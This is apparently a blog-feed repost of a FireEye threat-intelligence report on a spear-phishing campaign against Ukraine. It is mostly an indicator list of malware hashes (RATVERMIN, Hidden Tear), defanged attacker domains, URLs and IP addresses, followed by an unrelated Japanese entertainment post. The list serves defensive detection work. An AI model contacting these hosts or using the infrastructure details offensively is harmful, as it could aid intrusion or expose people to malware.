e8e954e4b01e93f10cefd57fce76de25 (RATVERMIN
task scheduler tool)
Hidden Tear Ransomware
8ff9bf73e23ce2c31e65874b34c54eac
Malicious Infrastructure
akamainet022[.]info
akamainet066[.]info
akamainet024[.]info
akamainet023[.]info
akamainet066[.]info
akamainet021[.]info
http://www.akamainet066[.]info
http://www.akamainet023[.]info
http://www.akamainet022[.]info
http://www.akamainet021[.]info
akamaicdn[.]ru
cdnakamai[.]ru
mailukr[.]net
notifymail[.]ru
http://www.notifymail[.]ru
tech-adobe.dyndns[.]biz
sinoptik[.]website
cdn1186[.]site
news24ua[.]info
http://sinoptik%5B.%5Dwebsite/EuczSc
http://sinoptik%5B.%5Dwebsite/OxslV6
http://cdn1186%5B.%5Dsite/zG4roJ
206.54.179.196
195.78.105.23
185.125.46.24
185.158.153.222
188.227.16.73
212.116.121.46
185.125.46.158
94.158.46.251
188.227.75.189
Correlated Infrastructure
78.140.167.89 (pdns)
1ua[.]eu (pdns)
24ua[.]website (pdns, registered by
[email protected])
cdn1214[.]site (pdns)
censor[.]website (pdns, registered by [email protected])
fakty[.]website (pdns, registered by [email protected])
gismeteo[.]website (pdns, registered by [email protected])
lmeta[.]eu (pdns)
me.co[.]ua (pdns, registered by
[email protected])
milnews[.]info (pdns)
mj2[.]pw
(pdns, registered by [email protected])
novaposhta[.]website (pdns, registered by
[email protected])
olx[.]website (pdns, registered by
[email protected])
http://www.olx[.]website (pdns, registered by
[email protected])
onlineua[.]website (pdns, registered by
[email protected])
r2a[.]pw (pdns, registered by
[email protected])
rarnbier[.]ru (pdns)
rbc[.]website (pdns)
rst[.]website (pdns, registered by
[email protected])
satv[.]pw (pdns, registered by
[email protected])
slaviasoft[.]website (pdns, registered by
[email protected])
tv.co[.]ua (pdns, registered by
[email protected])
uatoday[.]website (pdns, registered by
[email protected])
ukrnews[.]website (pdns, registered by
[email protected])
http://www.ukrnews[.]website (pdns, registered
by [email protected])
ukrposhta[.]website (pdns,
registered by [email protected])
unian[.]pw (pdns)
vj2[.]pw (pdns, registered by [email protected])
windowsupdate.kiev[.]ua (pdns)
xn--90adzbis.xn--c1avg
(registered by [email protected])
z1k[.]pw (pdns,
registered by [email protected])
188.164.251.61
(pdns)
188.227.17.68 (pdns)
206.54.179.160 (pdns of
many malicious domains)
208.69.116.100 (pdns)
208.69.116.144 (pdns)
5.200.53.181 (pdns)
78.140.162.22 (pdns)
78.140.167.137 (pdns)
88.85.86.229 (pdns)
88.85.95.72 (pdns)
94.158.34.2 (pdns)
94.158.47.228 (pdns)
#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */
Go to Source
Author: John Hultquist Spear Phishing Campaign Targets Ukraine Government and Military; Infrastructure Reveals Potential Link to So-Called Luhansk People’s Republic Original Post from FireEye Author: John Hultquist In early 2019, FireEye Threat Intelligence identified a spear…
0 notes
Text
西城秀樹、郷ひろみ、沢田研二…!昭和を彩るスターたちの勇姿を ...
#歌舞伎 #中村歌風 [ニュースウォーカー]まず1月に放送されるのは、天地真理と沢田研二が共演し、天地が歌う主題歌も話題になった『虹をわたって』(73 … そして2月には野口五郎と大竹しのぶが共演した『季節風』(77)、桜田淳子と早乙女愛共演の『スプーン一杯の幸せ』(75)、そして遠藤周作 …
0 notes